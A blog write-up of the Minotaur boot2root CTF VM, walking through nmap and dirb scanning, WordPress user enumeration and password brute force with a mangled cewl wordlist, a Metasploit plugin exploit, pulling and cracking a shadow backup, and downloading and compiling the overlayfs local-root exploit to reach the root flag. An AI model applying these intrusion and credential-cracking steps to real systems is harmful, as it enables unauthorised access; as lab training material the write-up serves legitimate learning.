30 March 2023

Pentesting Fun Stuff

following the cyber security path…

SecTalks: BNE0x00 – Minotaur


Minotaur CTF
Minotaur is a boot2root CTF. Once you load the VM, treat it as a machine you can see on the network, i.e. you don’t have physical access to this machine. Therefore, tricks like editing the VM’s BIOS or Grub configuration are not allowed. Only remote attacks are permitted. There are a few flag.txt files around to grab. /root/flag.txt is your ultimate goal.
This CTF has a couple of fairly heavy password cracking challenges, and some red herrings.
One password you will need is not on rockyou.txt or any other wordlist you may have out there. So you need to think of a way to generate it yourself.


There is some problem with finding the vm in my host-only network.
To tacle this problem I tried a horizontal scan at port 80.

nmap -v -O -Pn -p 80

After I found the host, I went for a vertical scan at the found host.

nmap -A -p- -T4

Port 22 (SSH), 80 (web) and 2020 (FTP) are open. Also with port 2020 anonymous ftp login is allowed. After I tried the web server, which had nothing of importance, I tried SSH.
SSH was protected by authentication. So finally I went for the third and final option.

Anonymous FTP login

Let’s log in with the username ‘anonymous’.

ftp 2020

Well that’s not it. My options are running short. I need more information. Time to give Dirb another try, but this time with a different list.

dirb /usr/share/wordlists/dirb/big.txt

Nice. Dirb found the directory ‘bull’ and it seems it runs on wordpress. Let’s take a look.
Looks like the website runs on WordPress version 4.2.2. Time to use wpscan.

wpscan –url –enumerate u

There is the username. Now for the password. The hint in the description said I needed to generate my own wordlist, because it wasn’t on rockyou.txt. So let’s start generating wordlists.

cewl -w wordlist.txt

wpscan –url –wordlist /wordlist.txt –username bully –threads 50

Nothing. Hmmmm. The hint was clear. My list isn’t sufficient enough. I need to mix up the collected words in my list more. Maybe I can find something with Google.
Not really anything I was looking for. But there were an awful lot of mentions to John the Ripper. Looking in Kali at the options of this program, there was an option for mangling words. With this information I started my searches on Google different and after a while I found a site with the right answer (https://www.win.tue.nl/~aeb/linux/john/john.html).

john –wordlist=wordlist.txt –rules –stdout > mangled-wordlist.txt

Yes! Jackpot!
Now let’s get back to a previously found vulnerability during the first wpscan.
Time to start up metasploit and search the database for Slideshow Gallery exploit.
Now to get a shell and look around.
We have a flag. But looks like there is more…….

find / -print | grep -i flag.txt
/tmp/flag.txtcat /var/www/html/flag.txt

Back to the shadow.bak file. Let’s download it and run it with John the Ripper.

meterpreter > download /tmp/shadow.bak
[*] downloading: /tmp/shadow.bak -> shadow.bak
[*] download : /tmp/shadow.bak -> shadow.bak


heffer@minotaur:/home$ cd heffer
heffer@minotaur:~$ ls
heffer@minotaur:~$ cat flag.txt
So this was an easy flag to get, hopefully. Have you gotten ~minotaur/flag.txt yet?
Th3 fl@G 15: m00000 y0


minotaur@minotaur:/home/heffer$ cd /home/minotaur
minotaur@minotaur:~$ ls
flag.txt peda
minotaur@minotaur:~$ cat flag.txt
Congrats! You’ve found the first flag:
M355 W17H T3H 8ULL, G37 73H H0RN!
But can you get /root/flag.txt ?

Why yes I can!

minotaur@minotaur:~$ cat /etc/*-release
cat /etc/*-release
VERSION=”14.04.2 LTS, Trusty Tahr”
PRETTY_NAME=”Ubuntu 14.04.2 LTS”

So Ubuntu 14.04. That means I’m going for ‘overlayfs’ Local Root Shell (https://www.exploit-db.com/exploits/37292/).

minotaur@minotaur:~$ wget
–2016-07-29 01:36:49–
Connecting to… connected.
HTTP request sent, awaiting response… 200 OK
Length: 4968 (4.9K) [text/x-csrc]
Saving to: ‘overlayfs.c’
100%[======================================>] 4,968 –.-K/s in 0s
2016-07-29 01:36:49 (152 MB/s) – ‘overlayfs.c’ saved [4968/4968]
minotaur@minotaur:~$ ls
flag.txt overlayfs.c peda
minotaur@minotaur:~$ gcc overlayfs.c -o overlayfs
minotaur@minotaur:~$ chmod 777 overlayfs
minotaur@minotaur:~$ ls
flag.txt overlayfs overlayfs.c peda
minotaur@minotaur:~$ ./overlayfs
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# whoami

Woot! Now let’s get final flag.

# cd /root
# ls
flag.txt peda quotes.txt
# cat flag.txt
cat flag.txt

After a different approach I learned that the final flag was much simpler to uptain.
The whole getting root was not necessary seeing that user minotaur was able to run every program as root. But hey…..It was fun anyway.

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.